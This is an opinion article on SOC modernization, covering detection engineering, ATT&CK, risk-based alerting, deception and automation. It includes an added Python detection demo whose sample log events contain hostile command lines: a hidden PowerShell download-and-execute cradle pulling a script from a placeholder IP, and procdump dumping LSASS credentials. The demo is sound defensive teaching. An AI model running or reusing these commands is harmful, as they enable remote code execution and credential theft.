SOC Modernization: 8 Key Considerations
The RSA 2022 Security Conference is just weeks away, and the security community is geared up and ready to meet in person at the Moscone Center in San Francisco.
While we’ve certainly done a lot of work remotely over the past two years, cybersecurity remains in a precarious position in 2022, so some industry-wide rethinking is in order. We are at a point where the scale and complexity of historical security defenses are either not working or are stretched to their limits. That means CISOs need to think about security transformation, and as they do, every process and every layer of the security technology stack is at stake.
Now, there will be a lot of hype at the conference around security “platforms” such as Extended Detection and Response (XDR), Cloud Native Application Protection Platforms (CNAPP), Secure Access Service Edge (SASE), and Zero Trust, all important topics, but also littered with industry hype and associated user confusion. My good friend Candy Alexander, President of ISSA International, and I will be discussing these trends at our RSA session Tuesday morning (6/7). But when I’m not presenting with Candy, I’ll be learning everything I can about upgrading the Security Operations Center (SOC).
Let me describe in more detail what I mean by SOC modernization. SOCs are where the proverbial rubber meets the road when it comes to cybersecurity. SOC analysts are responsible for detecting threats in a timely manner, investigating those threats to determine their scope and impact, disrupting cyberattacks to prevent or minimize damage, working with IT operations to fully restore business/IT operations, and then using those teachable moments to further strengthen their defenses.
Unfortunately, these processes have become cumbersome over the years. SOC staff face a constant tsunami of alerts and must respond with disconnected point tools and manual processes. And let’s not forget the global cybersecurity skills shortage. According to ESG research, The Life and Times of Cybersecurity Professionals 2021, 57% of organizations are affected by cybersecurity skills shortages, leading to increased staff workloads, high burnout rates, and an inability for security professionals to learn and use cybersecurity technologies to their full potential.
SOC Modernization Planning Considerations
These issues should sound the sirens in the CISO office, guiding them toward strategies for modernizing the SOC. When developing these plans, they should consider:
- The SOC architecture. Today’s disconnected tools must become tomorrow’s interoperable technology architecture. Whether you call it Security Operations and Analytics Platform Architecture (SOAPA, ESG’s term) or Cybersecurity Mesh (Gartner’s term), disparate technologies like EDR, NDR, SIEM, TIP and SOAR require tight integration. Some organizations refer to a modern SOC as a fusion center, combining threat researchers, SOC analysts, and incident responders. This mashup can only work if it is anchored in an open and customizable SOC architecture.
- Scale and performance. As the saying goes, “all data is security data”. In other words, SOC teams collect, process, and analyze terabytes of data from security tools, IT infrastructure components, applications, CSPs, SaaS vendors, identity stores, threat intelligence feeds, etc., to determine if they are being attacked. This requires a highly scalable cloud backend that can ingest real-time data streams and deliver acceptable response times for complex queries.
- Detection engineering. While technology vendors have improved at producing detection rule content, SOC teams still need better tools to develop, modify, test, and share custom rule sets. This means developing expertise with YARA rules (and YARA-L for Google Chronicle), Sigma rules and Kestrel hunt flows, while participating in open source projects like Snort, Bro/Zeek, Suricata, etc. Specialist providers like Anvilogic can help here.
- MITRE ATT&CK affinity. The MITRE ATT&CK framework has become a lingua franca of security operations, but many organizations have not moved beyond using it as a reference. SOC modernization goes one step further by operationalizing MITRE ATT&CK for use cases such as threat detection, control assessment/engineering, adversary behavior tracking, and continuous testing. Yes, security tools should support MITRE ATT&CK, but that support should go beyond simply labeling alerts with the tactics and techniques of the matrix. Rather, tools should contribute to and participate in these more comprehensive use cases, for example by reporting which techniques a rule set covers and where the gaps are.
- Risk-based context. When an asset is under attack, security analysts need to understand whether it is a test/development server or a cloud-based workload hosting a mission-critical application. To gain this insight, SOC modernization combines data on threats, vulnerabilities, and business context for analysts. A quick look at the industry confirms that this combination is already happening. Cisco bought Kenna Security for risk-based vulnerability management, Mandiant grabbed Intrigue for attack surface management, and Palo Alto Networks gobbled up Expanse for ASM. Meanwhile, SIEM leader Splunk provides risk-based alerting, accumulating risk scores per user or asset so analysts can prioritize response and remediation actions. SOC modernization makes this combination a requirement.
- Continuous testing. SOC modernization includes a commitment to continuous improvement. This means understanding the behavior of threat actors, validating that security defenses can counter modern attacks, and then closing any defensive gaps that surface. CISOs are establishing continuous red team and purple team exercises for this very purpose. In this way, SOC modernization will drive demand for continuous testing and attack path management tools from vendors such as AttackIQ, Cymulate, Randori, SafeBreach, and XM Cyber.
- Deception technology. Okay, this one might be a bit controversial because most cybersecurity professionals believe that deception technology is only appropriate for elite practitioners – the infosec equivalent of Dumbledore. This was true 10 years ago but not anymore. Modern deception technology can understand an organization’s assets, identities, and data, then mimic them by creating authentic decoys and lures. The best deception systems, like those from Zscaler (Smokescreen), do a lot of the work themselves. In the face of threats like ransomware that could wipe out all business operations, I think it’s time to add deception technology as a layer of defense (and more) for SOC modernization.
- Automation of processes. We have been working on this for several years now, but I believe that modernizing the SOC will be a force multiplier for the automation of security operations processes. Why? Technology integration makes it easy, low-code/no-code SOAR tools like Torq’s have alleviated the need for Python gurus, and many SOC technologies provide pre-built automation templates and workflows. Finally, modernizing the SOC gives CISOs the ability to assess and reengineer processes, making them more friendly for automation.
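The detection engineering, MITRE ATT&CK and risk-based context items above describe one pipeline: a custom rule fires, the alert is tagged with the ATT&CK technique it covers, and business context decides how loudly it should ring. The block below is an added example (not code from the article, ESG, or any of the vendors named) of that pipeline in miniature. It implements only a small subset of Sigma (one selection map, an optional filter map, the `contains`/`endswith`/`startswith` modifiers, and the conditions `selection` or `selection and not filter`), and the two rules, the Sysmon-style events, the host names, the asset tiers, the score table and the escalation threshold are all constructed for the demo. The per-entity risk accumulation is modeled loosely on the risk-based alerting idea mentioned above, not on any vendor's implementation.

```python
"""Added example: Sigma-subset rule matching, ATT&CK tagging and risk-based
alert aggregation. Rules, events, hosts and asset tiers are constructed."""
import re
from collections import defaultdict

# Rules in (a subset of) Sigma's structure, written as dicts instead of YAML.
RULES = [
    {"title": "PowerShell Download Cradle",
     "tags": ["attack.execution", "attack.t1059.001"],
     "logsource": {"product": "windows", "category": "process_creation"},
     "detection": {
         "selection": {"Image|endswith": "\\powershell.exe",
                       "CommandLine|contains": ["DownloadString", "Invoke-WebRequest"]},
         "filter": {"ParentImage|endswith": "\\ccmexec.exe"},  # SCCM client noise
         "condition": "selection and not filter"},
     "level": "high"},
    {"title": "LSASS Dump via Procdump",
     "tags": ["attack.credential_access", "attack.t1003.001"],
     "logsource": {"product": "windows", "category": "process_creation"},
     "detection": {
         "selection": {"Image|endswith": ["\\procdump.exe", "\\procdump64.exe"],
                       "CommandLine|contains": "lsass"},
         "condition": "selection"},
     "level": "critical"},
]

# Constructed asset inventory: the business context joined onto every alert.
ASSETS = {
    "ws-finance-12": {"tier": "user workstation", "criticality": 1.0},
    "dev-build-03": {"tier": "test/dev", "criticality": 0.5},
    "erp-db-01": {"tier": "mission-critical", "criticality": 3.0},
}
LEVEL_SCORE = {"low": 10, "medium": 30, "high": 60, "critical": 90}  # assumed weights
TECH_TAG = re.compile(r"attack\.(t\d{4}(?:\.\d{3})?)")

# Constructed process-creation events (Sysmon-style field names).
PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
EVENTS = [
    {"host": "ws-finance-12", "Image": PS, "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": "powershell -nop -w hidden -c IEX((New-Object Net.WebClient)"
                    ".DownloadString('http://203.0.113.5/a.ps1'))"},
    {"host": "ws-finance-12", "Image": "C:\\Tools\\procdump64.exe",
     "ParentImage": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "procdump64.exe -ma lsass.exe C:\\Temp\\out.dmp"},
    {"host": "ws-hr-07", "Image": PS, "ParentImage": "C:\\Windows\\CCM\\CcmExec.exe",
     "CommandLine": "powershell -c Invoke-WebRequest -Uri https://sccm.corp.example/ -OutFile x"},
    {"host": "dev-build-03", "Image": PS, "ParentImage": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "powershell Invoke-WebRequest http://203.0.113.9/b.zip -OutFile b.zip"},
    {"host": "erp-db-01", "Image": "C:\\Windows\\Temp\\procdump.exe",
     "ParentImage": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "procdump.exe -ma lsass.exe dump.bin"},
    {"host": "erp-db-01", "Image": "C:\\Program Files\\MSSQL\\Binn\\sqlservr.exe",
     "ParentImage": "C:\\Windows\\System32\\services.exe", "CommandLine": "sqlservr.exe -s MSSQLSERVER"},
]


def _field_matches(event, key, expected):
    """One 'Field|modifier: value(s)' entry; list values are ORed, case-insensitive."""
    field, _, modifier = key.partition("|")
    value = event.get(field)
    if value is None:
        return False
    v = str(value).lower()
    for exp in (expected if isinstance(expected, list) else [expected]):
        e = str(exp).lower()
        if (modifier == "contains" and e in v) or (modifier == "endswith" and v.endswith(e)) \
                or (modifier == "startswith" and v.startswith(e)) or (modifier == "" and v == e):
            return True
    return False


def evaluate_rule(rule, event):
    """Supports the conditions 'selection' and 'selection and not filter' only."""
    det = rule["detection"]
    m = re.fullmatch(r"(\w+)(?: and not (\w+))?", det["condition"])
    if not m:
        raise ValueError("unsupported condition: " + det["condition"])
    hit = {n: all(_field_matches(event, k, x) for k, x in det[n].items())
           for n in det if n != "condition"}
    return hit[m.group(1)] and not (m.group(2) and hit[m.group(2)])


def rule_techniques(rule):
    """ATT&CK technique IDs from Sigma tags, e.g. attack.t1059.001 -> T1059.001."""
    return [m.group(1).upper() for m in map(TECH_TAG.fullmatch, rule["tags"]) if m]


def attack_coverage(rules, techniques_of_interest):
    """Which techniques the rule set covers and which remain gaps."""
    covered = {t for r in rules for t in rule_techniques(r)}
    wanted = set(techniques_of_interest)
    return sorted(covered & wanted), sorted(wanted - covered)


def run_pipeline(rules, events, assets, threshold=100):
    """Match rules, tag alerts, then accumulate risk per host weighted by criticality.
    A host is escalated when its score passes the threshold or two distinct techniques appear."""
    alerts = [{"host": ev["host"], "rule": r["title"], "level": r["level"],
               "techniques": rule_techniques(r)}
              for ev in events for r in rules if evaluate_rule(r, ev)]
    risk = defaultdict(lambda: {"score": 0.0, "techniques": set()})
    for a in alerts:
        crit = assets.get(a["host"], {"criticality": 1.0})["criticality"]  # unknown hosts count as 1.0
        risk[a["host"]]["score"] += LEVEL_SCORE[a["level"]] * crit
        risk[a["host"]]["techniques"].update(a["techniques"])
    notable = sorted(h for h, r in risk.items()
                     if r["score"] >= threshold or len(r["techniques"]) >= 2)
    return alerts, dict(risk), notable


if __name__ == "__main__":
    alerts, risk, notable = run_pipeline(RULES, EVENTS, ASSETS)
    for a in alerts:
        print(f"{a['host']:14} {a['level']:8} {a['rule']} {a['techniques']}")
    print("escalate:", notable)
    print("coverage/gaps:", attack_coverage(RULES, ["T1059.001", "T1003.001", "T1566.001", "T1078"]))
```

Run as a script it prints four alerts (the SCCM-spawned PowerShell on ws-hr-07 is suppressed by the filter), escalates erp-db-01 on a single critical hit because of its asset criticality and ws-finance-12 because two distinct techniques were seen, and leaves the same PowerShell cradle on the test/dev host as a low-priority alert. The coverage call is the "beyond labeling alerts" point from the ATT&CK item: the same tags that decorate alerts tell you the rule set has nothing for T1078 or T1566.001.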
SOC modernization goes beyond technology alone, giving organizations the opportunity to reassess skills and roles while supporting a distributed workforce. More on that soon. In the meantime, I’ll comb the hallways, ballrooms, and meeting rooms of RSA, soaking up as much knowledge as I can about SOC modernization.
Copyright © 2022 IDG Communications, Inc.